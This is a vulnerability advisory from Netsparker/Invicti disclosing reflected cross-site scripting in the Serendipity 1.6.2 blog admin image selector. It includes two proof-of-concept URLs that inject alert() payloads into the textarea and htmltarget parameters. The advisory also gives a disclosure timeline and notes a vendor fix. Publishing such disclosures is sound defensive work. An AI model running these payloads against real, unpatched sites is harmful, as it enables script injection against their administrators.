XSS Vulnerabilities in Serendipity
Information
Advisory by Netsparker (now Invicti)
Name: XSS Vulnerabilities in Serendipity
Software: Serendipity 1.6.2 and possibly below.
Vendor Homepage: http://www.s9y.org/
Vulnerability Type: Cross-Site Scripting
Severity: Medium
Researcher: Omar Kurt
Advisory Reference: NS-13-003
Description
Serendipity is a PHP-powered weblog application that gives the user an easy way to maintain an online diary, weblog, or even a complete homepage. While the default package is designed for the casual blogger, Serendipity offers a flexible, expandable, and easy-to-use framework with the power for professional applications.
Details
Serendipity is affected by XSS vulnerabilities in version 1.6.2.
http://example.com/serendipity_admin_image_selector.php?serendipity%5Btextarea%5D=%27%2Balert(0x000887)%2B%27&serendipity%5Baction%5D=208.100.0.117
&serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117
&serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117http://example.com/serendipity_admin_image_selector.php?serendipity%5Bhtmltarget%5D=%27%2Balert(0x000A02)%2B%27&serendipity%5Baction%5D=208.100.0.117
&serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117
&serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117
Learn more about Cross-Site Scripting:
Solution
The vendor fixed this vulnerability in the new version. Please see the references.
Advisory Timeline
26/02/2013 – First contact
04/03/2013 – Sent the details
12/07/2013 – Advisory released
Credits
It has been discovered on testing It has been discovered on testing of Invicti Web Application Security Scanner.
References
- MSL Advisory Link: /web-applications-advisories/xss-vulnerabilities-in-serendipity/
- Invicti Advisories: /web-applications-advisories/
About Invicti
Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.